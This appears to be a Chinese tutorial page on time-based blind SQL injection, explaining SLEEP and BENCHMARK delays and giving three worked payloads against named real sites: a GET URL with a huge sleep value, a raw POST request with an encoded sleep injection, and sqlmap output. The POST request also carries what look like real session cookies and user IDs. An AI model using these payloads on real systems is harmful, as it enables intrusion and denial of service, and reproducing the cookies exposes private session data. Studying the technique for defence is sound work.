您好,登錄后才能下訂單哦!
A: 時間差注入也叫延遲注入,是一種盲注的手法 提交對執行時間銘感的函數sql語句,通過執行時間的長短來判斷是否執行成功,比如:正確的話會導致時間很長,錯誤的話會導致執行時間很短,這就是所謂的高級盲注。
利用BENCHMARK sleep 函數來注入
利用sleep也可以引起拒絕服務
B:
有時候當我們注入某站時,某站突然就打不開了,
被防火墻暫時隔離,你沒法瀏覽他的頁面,這時候你不得不換換IP,或者等待恢復,
或者提交注入參數的時候,網站的某種保護措施,他會跳轉某個錯誤頁面,訪問N次錯誤頁面的時候,才會正常訪問。
這樣就會影響咱們的效率,這就是為什么延時注入也算一節課的原因,還是蠻重要的.
C:
途牛主站延時注入+waf繞過
http://www.2cto.com/Article/201502/377118.html
eg.1
http://wap.people.com.cn/newsView.php?sid=&cnid=1456639 and sleep(99999999999)&chid=1_14_3&coid=1_14_3_1&wv=2&v=l&return=c
eg.2
POST /main.php?do=online_book_do_visitor HTTP/1.1
Host: km.tuniu.com
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://km.tuniu.com/main.php?do=online_book_visitor&order_id=4550094
Content-Length: 285
Cookie: p_phone_400=4007-999-999; PHPSESSID=8v1dgvcbbm0elnoprf91chnfv7; tuniu_channel=MTAwLDAsZDdiY2U0NTViYjViMDFhNWExYzk1YTM2ZjZiNDEyY2Q%3D; tuniuuser_citycode=MzMwMg%3D%3D; s_cc=true; s_nr=1421595835812; s_sq=%5B%5BB%5D%5D; __utma=1.151979505.1421595199.1421595199.1421595199.1; __utmb=1.170.9.1421599758357; __utmc=1; __utmz=1.1421595199.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _tacau=MCxmMWJlYWNiMS03N2M1LTQ0ZjEtOThlMC0wYzc5ZWE2ZTRjMmQs; _tact=Y2UyNzU5NmMtMDIxNS0yMjFjLTgzYjItMDgxODUyOTM0ODVm; _tacz2=taccsr%3D%28direct%29%7Ctacccn%3D%28none%29%7Ctaccmd%3D%28none%29%7Ctaccct%3D%28none%29%7Ctaccrt%3D%28none%29; _taca=1421595199130.1421595199130.1421595199130.1; _tacb=NGYzNDkyNWMtY2ZlNi05MmJjLTA4MDAtOTgxMmFlYjRlZTkx; _tacc=1; tuniuuser_ip_citycode=MjAw; tuniuuser=NzczODQ4Niw2ODIzNjEzODU5LDY4MjM2MTM4NTkmcXVvdDsmYW1wO2d0O3M7JiMwMzk7LDAsMTQyMTU5NTQzMiw5ZjY0OTg2YzdkYzE0NzM0ZDEwZGFiZjM2NWYyMDBlOQ%3D%3D; tuniusub=1; tuniuuser_p_w_picpath=aHR0cDovL20udHVuaXVjZG4uY29tL2ZpbGVicm9rZXIvY2RuL3ByZC83NS8wYy83NTBjMmRhYmFhZjRmYjY4ZjI2NzVlM2NlZjA1YmM2ZC5wbmc%3D; tuniuuser_vip=MA%3D%3D; tuniuuser_level=MA%3D%3D; tuniuuser_id=7738486; tuniuuser_name=NjgyMzYxMzg1OSZxdW90OyZhbXA7Z3Q7czsmIzAzOTs%3D; Hm_lvt_dbdbb8d9c6cd72876c254897549e524b=1421503111,1421591375,1421594808,1421595437; Hm_lpvt_dbdbb8d9c6cd72876c254897549e524b=1421597431; tuniu_app_cc=list_three_days; tuniu_zeus=MzNfMV8yXzFfMV83OjpodHRwOi8vd3d3LnR1bml1LmNvbS9zdGF0aWMveW91amkvOjoyMDE1LTAxLTE4IDIzOjM5OjE0%2CMV8xXzFfMl8xXzE6Omh0dHA6Ly90b3AudHVuaXUuY29tLzo6MjAxNS0wMS0xOCAyMzo0NTozMA%3D%3D%2CMTFfMl8xXzJfNV8xOjpodHRwOi8vd3d3LnR1bml1LmNvbS86OjIwMTUtMDEtMTggMjM6NDY6MDg%3D%2CMV8xXzFfMl8xXzE6Omh0dHA6Ly93d3cudHVuaXUuY29tLzo6MjAxNS0wMS0xOCAyMzo0ODozNQ%3D%3D%2CMTJfMl8xXzFfMl8zOjpodHRwOi8vd3d3LnR1bml1LmNvbS86OjIwMTUtMDEtMTkgMDA6NDk6MTg%3D; visit_history=5186662%2C780023%2C; _um_uuid=f7a45f3da941376f5abce7a65b613f27; __ozlvd1940=1421602934; tuniu_is_login=MQ%3D%3D; tuniu_newer=set_one_day; Hm_lvt_44f54d76a67ba9230a7bb92d5ed5e4ba=1421253828,1421597324; Hm_lpvt_44f54d76a67ba9230a7bb92d5ed5e4ba=1421597366; appdown=1; TUNIUmuser=1c80b2cffeddb233b6a4fbfddb375c15; tuniu_partner=MTAxLDAsLDlmZDgyZThjYTZkNGMwMTlmZTUyNzdlYjJmNTcxYzQ1; pgv_pvi=3638345589; pgv_info=ssi=s4790786375; tel_400=4007996820; PageSwitch=2%2C1429375904; __utmt=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
visitor_info=123,33071919680425367s1l'+and+sleep%252811%2529+and+'1,1,1968-04-25,
eg.3
Place: GET
Parameter: appid
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: appid=330051' AND SLEEP(5) AND 'xRsl'='xRsl&host=admin5.com
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。